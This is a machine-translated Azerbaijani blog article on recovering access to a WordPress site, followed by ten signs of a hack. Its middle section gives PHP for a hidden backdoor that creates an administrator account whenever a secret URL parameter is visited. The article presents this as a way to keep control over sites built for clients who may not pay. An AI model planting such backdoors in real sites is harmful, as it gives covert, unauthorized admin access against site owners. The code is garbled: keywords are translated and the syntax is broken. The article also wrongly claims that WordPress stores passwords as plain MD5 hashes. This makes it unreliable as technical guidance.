Tamamilə Bələdçi olan bir WordPress veb saytına necə girmək olar

Tam bələdçi olan bir WordPress veb saytına necə girmək olar


Hər hansı bir qanunsuz və ya zərərli davranışı qəbul etmirik, təsdiq etmirik və təşviq etmirik! Bu yazının məqsədi sizə aid bir WordPress saytına necə hack etmək və ya bərpa etmək və ya redaktə etmək, idarə etmək və daxil olmaq hüququnuz olduğunu izah etməkdir. Nə etsəniz, öz başınıza edirsiniz. Biz sizin hərəkətlərinizə görə cavabdeh deyilik. Bu təlimat yalnız təhsil məqsədləri üçün xidmət edir.

Təsvir edilən üsullar sayta girməyinizə baxmayaraq, sayta girməyinizi bərpa etməyə kömək edəcək, ancaq sayt haqqında bəzi məlumatlar tələb edəcək və onlar heç bir təsadüfi WordPress quraşdırmasına girməyinizə kömək edə bilməz..

Bu təlimatda sizə göstərmək niyyətindəyik:

  • Bir WordPress veb saytına necə girmək olar
  • WordPress-də arxa bir yer necə yaradır
  • FTP vasitəsilə yeni bir istifadəçi hesabı necə yaradılır
  • WordPress saytınıza hack edilmiş 10 işarədir

Tam bələdçi olan bir WordPress veb saytına necə girmək olar

Özünüzə kömək edə biləcəyiniz vəziyyətlər

Aşağıdakı hallardan birində olsanız, metodlarımız sizə girişi bərpa etməyə kömək edəcəkdir:

  • istifadəçi adınızı və ya e-poçt adresinizi unutmusunuz
  • sıfırlama parolu seçimi hosting serverində işləmir
  • sıfırlama e-poçtları keçmir
  • hesabın e-poçt ünvanına daxil ola bilməyəcəksiniz
  • istifadəçi adı və şifrənizi bilirsiniz, ancaq kombinasiya işləmir

Aşağıda təsvir olunan metodlardan istifadə etmək üçün sizə lazım olacaq aşağıdakılardan yalnız biri:

  • Serverə FTP girişi və ya
  • cPanel serverə giriş və ya
  • MySQL verilənlər bazasına giriş və uzaqdan ona qoşulma imkanı

Metod # 1 – MySQL yolu

Mövcud istifadəçinin şifrəsini dəyişdirmək və ya yeni bir hesab yaratmaq üçün bu metoddan istifadə edin. Saytın verilənlər bazasına cPanel girişi və ya birbaşa MySQL girişi lazımdır. Mövcud istifadəçinin şifrəsini dəyişdirməklə başlayaq.

Əgər cPanel istifadə edirsinizsə, giriş (cPanel-ə hər zaman daxil olmaq mümkündür) https://yoursite.com:208383 link), tapın və açın phpMyAdmin. Verilənlər bazası və cədvəllərin siyahısı solda. Bitəcək masanı axtarırsınız _userler. Yəqin ki, olacaq wp_users, lakin serverdə birdən çox WordPress saytınız varsa, doğru birini tapmalısınız.

Doğru cədvəldə redaktə etmək istədiyiniz istifadəçi olacaq. Bəzi xarici müştəri vasitəsilə MySQL-ə qoşulursanız, eyni proseduru edin SQLyog. Cədvəl və həqiqi istifadəçi qeydini tapdıqdan sonra şifrəni dəyişdirməyin vaxtı gəldi.

Yəqin ki, indiyə qədər başa düşdüyünüz kimi, parol bu yerdə saxlanılır user_pass sahəsində, MD5 alqoritmi istifadə edərək hashed. Açın onlayn MD5 generatoru istifadə etmək istədiyiniz parolu daxil edin və “Hash” düyməsini basın. Yaradılmış simli kopyalayın və orijinal parolu dəyişdirin Bununla. PhpMyAdmin-də iki qat vuraraq sahəni düzəldə bilərsiniz. Prosedur digər MySQL müştərilərində eynidır. Dəyişiklikləri qeyd edin və yeni şifrənizlə WordPress-ə daxil olun.

WP istifadəçiləri cədvəli

İstifadəçi adları, yığılmış parol və e-poçtlar içərisində saxlanılır wp_users verilənlər bazası cədvəli

Hələ 1 nömrəli metod – yeni istifadəçi yaratmaq

Yeni bir istifadəçi yaratmaq bir az daha mürəkkəbdir, lakin bir dəqiqədən az bir müddətdə idarə olunur. Yeni bir qeyd yaradın istifadəçilər cədvəlində yerləşdirin: user_login, user_pass (yuxarıda təsvir olunan MD5 funksiyasından istifadə etməklə hasil) və user_email. Bütün digər sahələr boş qala bilər; fərq etməzlər. Yeni qeyd edin. Xilas edildikdən sonra MySQL özünəməxsus şəxsiyyət sənədini verəcəkdir. Bu ID sahəsindəki nömrədir. Unutma.

İndi gedin _usermeta masa. Unutma, masanın prefiksi istifadəçilərlə eyni olmalıdır. Məsələn wp_users və wp_usersmeta. Prefiks eyni deyilsə, səhv bir cədvəl (başqa WP quraşdırma) düzəldin və yeni hesab işləmir. İki yeni qeyd yaradacağıq. Bunlara əhəmiyyət verməyin umeta_id hər ikisi üçün sahə. Set İstifadəçi adı yalnız xatırladığınız dəyərə (istifadəçilər cədvəlindəki yeni şəxsiyyət dəyəri). İlk rekord dəsti üçün meta_key üçün wpct_user_level və meta_value üçün 10. Ikinci üçün meta_key üçün wpct_cabilliklər və meta_value üçün a: 1: {s: 13: "idarəçi"; b: 1;}. Hər ikisini də edin. Bitirdin – giriş!

Metod # 2 – funksiyaları.php yolu

Bu yanaşma ya function.php ya cPanel vasitəsi ilə düzəldilə bilər, ya da bunu etmək üçün FTP müştərisindən istifadə oluna bilər. CPanel istifadə etsəniz, Fayl menecerini tapın və açın. Əvvəlcə aktiv mövzunun qovluğunu tapmalıyıq.

Getmək public_html / wp_content / mövzular qovluq. Dərhal mövzunu görsən və hansının olduğunu bilsən – əladır. Qovluğunu açın və redaktəyə başlayın funksiyaları.php. Yoxdursa, saytı açın, istənilən yerə sağ vurun, “Mənbə bax” seçin. Sonra Ctrl + F düymələrini basın və yazmağa başlayın / mövzular / tezliklə çox sayda URL qeyd olunacaq və aktiv mövzunun qovluq adını tanıyacaqsınız.

Fayl quruluşunda tapın, açın və redaktəyə başlayın funksiyaları.php. Faylın sonunda aşağıdakı kodu kopyalayın / yapışdırın. Bağlanışı ağla gətirin ?> Əgər varsa, PHP etiketləri. Sonuncu cərgədə olmalıdırlar. Beləliklə, onlardan əvvəl kodu daxil edin.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

əgər (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (array ('ID' => $ user_id, 'ləqəb' => $ new_user_email));

$ user = yeni WP_User ($ user_id);
$ user-> set_role ('administrator');
}

Yeni hesabınızı əks etdirmək üçün kodun yalnız ilk iki sətirini düzəldin. Bu e-poçt ilə WP-də artıq istifadəçi varsa, yeni bir hesab yaradılmır, ona görə də yeni olduğundan əmin olun. Şifrənizi də dəyişdirin – skript şirniyyatları tərəfindən sındırılmayın. Faylı saxladıqdan sonra sadəcə saytınızı açdıqdan sonra kod işə salınacaq, idarəçi imtiyazları olan yeni bir hesab yaradılıb və bununla daxil ola biləcəksiniz..

Bunu etdikdən sonra kodu silməyi unutmayın funksiyaları.php.

Hacking digər üsulları

FTP, cPanel və ya MySQL şifrəsini bilməklə serverə qanuni giriş hüququnuz olduğunu və buna görə də WordPress quraşdırma (s) larına daxil olmağınızı sübut edirsiniz. Əgər bu hesablarınız yoxdursa, heç yaxşı deyilsiniz (digər insanların saytlarına girmək) və bu, heç də xoş deyil!

Unutmayın ki, hər hansı bir kompüterə, saytlara və ya serverlərə icazəsiz giriş əldə etmək ağır bir cinayətdir və əksər ölkələrdə dərhal həll olunur..

WordPress saytınızın hack edilə biləcəyindən qorxursanız, bu səhifəni pulsuz WordPress təhlükəsizlik skaneri ilə yoxlayın. Bloqunuzu qurmağa vaxtınız yoxdursa, bunu sizin üçün edək.

WordPress-də arxa bir yer necə yaradır

Ön qapı bağlı olduqda, arxa qapını sınaya bilərsiniz. Bu, sayta girmə imkanı olmadan sayta daxil olmaq üçün koddan zərərli bir yol kimi görünə bilər, ancaq kimsə saytınızı oğurlayırsa, onu idarə etməli olduğunuz vaxtlar olur..

Başqa insanlar üçün etdiyiniz bir şey üçün veb saytlar yaradırsa, gec-tez işinizə görə pul verməkdən imtina edən bir müştəri olacaq; giriş məlumatlarınızı silmək və etdiyiniz hər şeyi nəzarətə götürəcək bir müştəri. Bəzən, FTP vasitəsilə yeni bir istifadəçi yaratmaq və ya bir şifrə sıfırlamaq kifayət edəcəkdir. Bu kifayət deyil zaman, geri yolunuzu hack etmək və ya admin səhifələrinizə açıq bir giriş yaratmaq istəyə bilərsiniz.

Ancaq WordPress mühitinizdə kiçik bir kod parçasını gizlətmək qərarına gəlsəniz, özünüzə bir ləyaqət qazandıra bilər və administrator imtiyazları ilə WordPress saytına giriş əldə edin. Oyunlar başlayır.

Bu oğru sizin məlumatlarınızı neçə dəfə silməyindən və yəqin ki, sahib olduğu bir serverdə bir nüsxəni bərpa etməsindən asılı olmayaraq, arxa giriş girişləri haqqında heç bir şey bilmədiyi bir şans var. Etmiş olsaydı, yəqin ki, WordPress-in qurulmasında köməyinizə ehtiyac duymaz?

Bir arxa otağı yaradın:

Tamam, danışıqla kifayətdir; iş yerinə yetirmək üçün lazım olan bir kod kodu budur:

  1. Funksiyalar.php faylı açın
  2. Aşağıdakı kodu kopyalayın / yapışdırın:
  3. add_action ('wp_head', 'wploop_backdoor');
    funksiya wploop_backdoor () {
    Əgər ($ _GET ['backdoor'] == 'knockknock') {
    tələb etmək ('wp-daxildir / qeydiyyatı.php');
    Əgər (! Username_exists ('username')) {
    $ user_id = wp_create_user ('ad', 'keçmək');
    $ user = yeni WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }
    }
    }
    ?>
  4. Dəyişiklikləri yadda saxla

Kodu olduğu kimi tərk edirsinizsə, saytda yeni bir admin yaratmaq üçün etməlisiniz http://www.yourdomain.com/?backdoor=knockknock

Səhifə yükləndikdən sonra yeni istifadəçi adınız “Ad” və şifrə “keçmək”.

Əlbəttə, kodda bunu dəyişə bilərsiniz yuxarıda ‘adı’ və ‘pass’ dəyişdirərək nə istəsən. Arxa qapınızdakı bağlantıları ‘arxa qapı’ və / və ya ‘knockknock’ u dəyişdirdiyiniz hər şeyə dəyişdirərək dəyişə bilərsiniz..

Funksiyanı sınayın – nəinki əyləncəli, həm də gələcəkdə tamamilə etibar edə bilmədiyiniz biri üçün veb sayt hazırlamağa hazırlaşdığınız zaman sizə kömək edə bilər. Həm də WordPress və blog bacarıqlarınızı düzəltməlisiniz.

FTP vasitəsilə yeni bir istifadəçi hesabı necə yaradılır

WordPress-də yeni istifadəçi hesabları yaratmaq çox asandır. Bir idarəçi olaraq gərək İstifadəçilər admin səhifəsinə keçin hər hansı bir istifadəçi rolu üçün yeni bir hesab yarada biləcəyiniz yer. Bu bir neçə saniyə ərzində edilə bilər və yeni yaradılan istifadəçi verilmiş istifadəçi adı və şifrə ilə dərhal daxil ola bilər.

Bəs WordPress idarəçinizə girişinizi itirirsinizsə nə olacaq? İşlər bir az daha mürəkkəbləşə bilər, ancaq narahat olmayın – sizin üçün admin həyatınızı xilas edə biləcək bir funksiyamız var.

Hesabınızı başqa bir administratorunuzun sildiyi, bütün istifadəçilərin verilənlər bazasından səhvsiz silməməsi, nasaz bir plagin istifadə etməməsi və ya haker hücumuna məruz qalmağınızdan asılı olmayaraq yenə də idarəyə qayıda bilərsiniz. Bəzən yalnız FTP serverinizə giriş əldə edə bilərsiniz, halbuki HTTP biri əlçatmaz və yeni bir idarəçi yaratmalı olacaqsınız. Bu nadir bir hal ola bilsə də, aşağıdakı funksiya sizi xilas edəcəkdir.

WordPress idarəetmə mühitindən kənarda yeni bir hesab yaratmaq, saytınıza bir FTP girişi lazımdır. Bir idarəçi olaraq, serverinizə daxil olmaq üçün bütün lazımi məlumatlara sahib olmalısınız və mövzusunda yeni bir funksiya yaratmaqla yeni bir hesab yarada bilərsiniz..

FTP vasitəsilə yeni istifadəçi hesabı yaradın:

  1. FTP müştərisini açın və hesabınıza qoşun
  2. Wp-content / temalara gedin
  3. İstifadə etdiyiniz mövzunun qovluğunu açın
  4. Funksiyaları.php faylını axtarın və onu redaktə edin
  5. Aşağıdakı funksiyanı kopyalayın və yapışdırın:
  6. funksiya admin_account () {
    $ user = 'İstifadəçi adı';
    $ pass = 'Parol';
    $ email = '[email protected]';
    əgər (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ istifadəçi, $ pass, $ email);
    $ user = yeni WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }}
    add_action ('tashabb', 'admin_account');
    
  7. İstifadəçi adınızı, şifrənizi və e-poçtunuzu unikal bir şeyə dəyişdirin
  8. Dəyişiklikləri yadda saxla

Funksiyada təyin etdiyiniz istifadəçi adınızı, şifrənizi və e-poçt adresinizin unikal olduğundan əmin olun əks halda funksiya düzgün işləmir. Dəyişiklikləri yadda saxladıqdan sonra, WP giriş panelinizə gedə bilərsiniz. Yenidən daxil olmaq üçün yeni məlumatlardan istifadə edin və hesabı təsdiqlədikdən sonra funksiyanı function.php faylından silə bilərsiniz.

Yuxarıda göstərilən funksiya bir admin hesabı yaradır, ancaq hər hansı digər istifadəçi rolu ilə hesab yaratmaq üçün asanlıqla dəyişdirə bilərsiniz. Sadəcə rolu 8-də dəyişdirinmin sıra kodu redaktora, müəllifə, töhfəçiyə, abunəçiyə və yaratdığınız hər hansı digər istifadəçi roluna.

Təəssüf ki, admin hesabınızı itirmisinizsə, bu istifadəçi adı altında yazılmış bütün yazıları da itirdiniz. Buna görə daima asanlıqla əldə edə biləcəyiniz bir nüsxə saxlamalısınız. Administrator hesabınız olanda oxuyursunuzsa, dərhal bir yedek yaratmaq üçün bunu xatırlatma olaraq götürün Gələcəkdə WordPress xaricində bir hesab yaratmağınız lazım olduqda bu məqaləni işarələyin.

WordPress saytınıza hack edilmiş 10 işarədir

WordPress böyük bir blog platformasıdır. Milyonlarla istifadəçi var və görünür ki, sayı hər gün sürətlə artır. İnsanlar hətta digər məzmun idarəetmə sistemlərində yaradılan veb saytlarını düşündüyünüzdən daha çox bu açıq mənbə sisteminə köçürməyə meyllidirlər. Bu yaxşı olsa da, bu o deməkdir hakerlər, həmçinin təsadüfi saytları işğal etmək istəyərkən WordPress-i bir nömrəli nöqtəyə qoyacaqlar.

Ümumiyyətlə, hackə düşsəniz, bu barədə dərhal biləcəksiniz. Saytınız əlçatmaz olacaq; daxil ola bilməyəcəksiniz və bəzən bir haker hətta ön səhifədə mesaj buraxır. Ancaq daha çox, bir şeyin dəyişdiyini də hiss edə bilməzsən. Məqalənin bu hissəsində, WordPress saytınızın sındırıldığını və problemin bir neçə həllini göstərə biləcək bir neçə əlamət göstərəcəyik..

1. Uğursuz giriş

Bu işarə olduqca aydındır. Heç bir problem yaşamadan bir müddət istifadəçi adı və şifrə birləşməsini istifadə etmisinizsə, birdən WordPress hesabınızı tanımırsa şübhəli ola bilərsiniz.. Bir haker saytınıza daxil olmağa başlamışsa, o, idarəetmə imtiyazlarınızı tez dəyişdirəcəkdir.

Bəlkə şifrənizi dəyişdirməli və ya hesabınızı tamamilə silib. İlk dəfə WordPress səhv istifadəçi adı / şifrəniz haqqında mesaj göndərdikdən sonra çaxnaşmaya başlamazdan əvvəl, səhv bir kombinasiyaya girdiyiniz və ya qapaq kilidləmə düyməsini yandırdığınız barədə düşünün..

Həll: E-poçt vasitəsilə şifrənizi bərpa etməyə çalışın və ya daxil olmaq üçün başqa bir hesabdan istifadə edin. Girişinizin etibarlı olduğundan əmin olmaq üçün quraşdırmağı məsləhət görürük. Giriş Ninja WordPress üçün plugin.

2. Saytınıza zərərli məzmun əlavə olunur

Saytda zərərli proqram xəbərdarlığı var

Saytınızdakı tanımadığı məzmunu görməyə başlasanız, narahat olmağa başlaya bilərsiniz. İdarəetmə sahənizə girmə şansı olduqda, hakerlər nüvənizi, həm mövzunuzu, həm də plugin fayllarınızı dəyişdirə biləcəklər. Bu o deməkdir ki, istədikləri hər şeyi dəyişdirməyə başlayırlar.

Bəzi hakerlər saytın görünüşünü kəskin şəkildə dəyişdirəcəklər və bəlkə də hackləndiyinizi söyləsələr də, digərləri bu barədə daha incə olacaqlar.

HəllVeb sayt kodunda gizli məzmun axtarmağa çalışın. Saytınızın alt altına əkilmiş zərərli saytlar hakerlərinə bağlantılar ola bilər və ya müntəzəm olaraq müştərilərinizə açılacaq popupları quraşdıra bilər. Saytınızı taramaq və ya saytınızı bu cür problemlərə davamlı nəzarət etmək üçün Təhlükəsizlik Ninja istifadə edin.

3. Şübhəli ziyarətlər

Veb saytınızı izləmirsinizsə, dərhal bunu etməyə başlamalısınız. Etməyin sadə bir yolu, bir çox digər xüsusiyyətlər arasında nə qədər ziyarət etdiyinizi və bu ziyarətlərin haradan gəldiyini söyləyə biləcək Google Analytics-dən istifadə etməkdir. Bir müddət sonra veb saytınızla tanış olacaqsınız. Bu o deməkdir ki, ziyarətlərin haradan gəldiyini, yeni bir kampaniyaya nə vaxt başlandığınızı və təbiətdə yayımlanan yeni təşviqat bağlantılarının olacağını biləcəksiniz..

Ancaq birdən saytınızın şübhəli domendən çox sayda yeni ziyarət aldığını görsəniz, saytınızı sıradan çıxartmaq mümkün olduğuna görə bunu daha da araşdırmaq istəyəcəksiniz. Adətən, bu cür ziyarətlər 100% sıçrayış sürəti ilə nəticələnəcək ki, bu da yalnız bir səhifəyə daxil olmaq deməkdir. Hakerlər tez-tez digər pis saytları özünüzə aparacaq avtomatlaşdırılmış sistemlərdən istifadə edəcəklər. Saytınızda icra olunan pis kod və ya bir spam şəbəkəsinin bir hissəsi olmağınızdan asılı olmayaraq, işlər ciddi şəkildə pozula bilər və saytınızı zərərli koda görə yoxlamalı olacaqsınız.

Həll: İstifadə edin Google Webmasters Alətləri şübhəli domenlər tapmaq

4. Trafikdə ani bir azalma

Saytın etibarlı gəzintisi

Hack edilmənin son qeyd olunan işarəsindən fərqli olaraq, bu, sizi xəbərdar edə bilər, çünki ziyarətlərin sayında birdən-birə azalma var. Bunun əvəzinə sizə yeni ziyarətləri istinad etmək, bir haker saytınızdan uzaq səfərlər göndərə bilər. Bu, bir haker saytınızı başqa birinə yönləndirdiyinə görə baş verə bilər. Ziyarətçilərin sayının az olmasının digər səbəbi, Google saytınızı qara siyahıya salmasıdır. Bu hərəkət, yoluxduğuna görə saytınızı açmamağı seçən hər bir istifadəçiyə bir mesaj göstərəcəkdir.

Həll: Google’dan istifadə edin Təhlükəsiz Baxış Saytı Vəziyyəti saytınızın təhlükəli olaraq qeyd olunduğunu və hazırda ziyarət üçün təhlükəli olub olmadığını yoxlamaq.

5. Axtarış motorunun nəticələri qəribədir

Saytınızda hər hansı bir dəyişiklik görməmisinizsə, ancaq Google və digər axtarış motorlarında axtarış nəticələrinin qəribə olduğunu (fərqli adlar və digər meta məlumatlarını göstərin) tapsanız, bu, hack edilmiş saytın açıq əlaməti ola bilər. Bir haker, məzmununuzu yalnız bir mütəxəssisə görünə biləcək bir şəkildə dəyişdirə bilər. Yenə də dəyişiklik axtarış motorunun nəticələrində görünəcəkdir.

Həll: İlə saytınızı yoxlayın Google Webmasters Alətləri, saytınızın buna hack olunduğunu yoxlayın pulsuz onlayn vasitə.

6. E-poçt göndərə / qəbul edə bilməzsiniz

Bir haker saytınıza daxil olduqdan sonra, çox güman ki, istəyəcək serverinizi hamıya spam göndərmək üçün istifadə edin. WordPress-dən yeni e-poçtlar göndərə və ya qəbul edə bilmədiyinizi bildiyiniz zaman, bu, sındırıldığınızın açıq bir əlaməti ola bilər. E-poçtunuzu bir daha yoxlayın, heç bir səhv olmadığından əmin olmaq üçün provayderinizlə yoxlayın.

Həll: WordPress’inizi sınayın poçt funksiyası bu pulsuz plugin ilə.

7. Sayt yoxdur

Server tapılmadı

Hakerlər zərərli kodu əkmək, istifadəçiləri yönləndirmək və ya e-poçtunuzu spam üçün istifadə etmək üçün saytınıza daxil ola bilməyəcəyiniz zamanlar olur. Bəzən, etmək istədikləri şey saytınızı çökdürməkdir. Nadir hallarda bir hacker hər şeyi bütün serverdən uğurla silir. Buna görə təhlükəsizliyinizi alacaq məşhur bir hosting şirkətində sənədlərinizi qəbul etməyiniz və veb saytınızın gündəlik və ya ən azı həftəlik ehtiyat nüsxələrini saxlamağınız vacibdir. Saytın tez bir zamanda bərpa oluna bilməsi üçün zaman-zaman öz ehtiyat nüsxələrinizi də düzəltməyiniz yaxşı bir təcrübədir.

Həll: WordPress-də ehtiyat idarəetmə üçün ən yaxşı pluginlərdən birini quraşdırın.

8. Şübhəli sənədlər

Mövcud fayllara əlavə edilə bilən zərərli məzmuna bənzəyir, bir haker kök qovluğunuzun hər hansı bir yerində əlavə fayllar əkə bilər. WordPress-də yolunuzu bilmək yaxşıdır, amma təcrübəli deyilsinizsə, bütün sənədlərinizi və fəaliyyətlərinizi yoxlaya bilən bir təhlükəsizlik alətiniz olmalıdır. Bu yaxınlarda, bütün WordPress sənədlərinizi yoxlamaq üçün mükəmməl bir vasitə olan Təhlükəsizlik Ninjasını nəzərdən keçirdik.

Həll: WordPress qurğularınıza aid olmayan sənədləri axtarmağa çalışın. Saytınızı müntəzəm olaraq taramaq və bu faylları avtomatik olaraq tapmaq üçün Təhlükəsizlik Ninja istifadə edin. Sonra faylları silin və ya zərərli kodu yoluxmuş fayllardan çıxarın. Təhlükəsizlik Ninja üçün əsas nüsxə skanerini unutma.

9. Yeni üzvlər

Saytınızdan asılı olaraq, yeni üzvlər əlavə edə bilən yeganə biri ola bilərsiniz. Bu halda, yeni qeydiyyatdan keçmiş istifadəçilər haqqında sizə bildirilən bir e-poçt həyəcan verə bilər. Yeni üzvlər əlavə etmə bacarığı olan digər idarəçilər varsa, şübhəli fəaliyyətlə əlaqədar onlarla əlaqə saxlayın.

Həll: Giriş URL-ini pulsuz bir plaginlə dəyişdirin, .htpasswd faylı istifadə edərək WordPress giriş səhifənizi məhdudlaşdırın və giriş formanızı hər zaman qorumaq üçün Giriş Ninja istifadə edin..

10. Serverinizdə planlaşdırılan hadisələrə baxın

Bəzən, bir hacker yol tapdıqdan sonra veb saytınıza bir şey etməz. Bunun əvəzinə, planlaşdırılan tədbirləri tərk edəcəklər gələcəkdə saytınıza zərər verə bilər. Bu üsul təhlükəlidir, çünki bir haker əvvəlcə təcrübəsiz qurbanı laqeyd qoyur. Siz yoluxmuş ola bilərsiniz və bu barədə heç nə bilmirsiniz.

Həll: İstifadə etdiyiniz bir serverdə CRON işlərini yoxlayın və şübhəli planlaşdırılan işlərin olmadığından əmin olun.

Qucaqlamaq

Ümid edirik ki, bu məqalə daha təhlükəsiz bir WordPress saytını idarə etməyə kömək edəcək və pis vəziyyətlərdə ona girişi bərpa etməyə kömək edəcəkdir. Və saytınız təmiz olsa belə, zəhmət olmasa bunu xahiş etmə.
Həmişə blogunuzun mümkün qədər etibarlı olduğundan əmin olun. Sizi ən çox saxlaya bilən WordPress üçün təhlükəsizlik plaginlərini təklif edirik. Hələ də, təhlükəli şifrə istifadə edən olmayın və öz WordPress saytınıza haker hücumunda ehtiyatlı olun.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map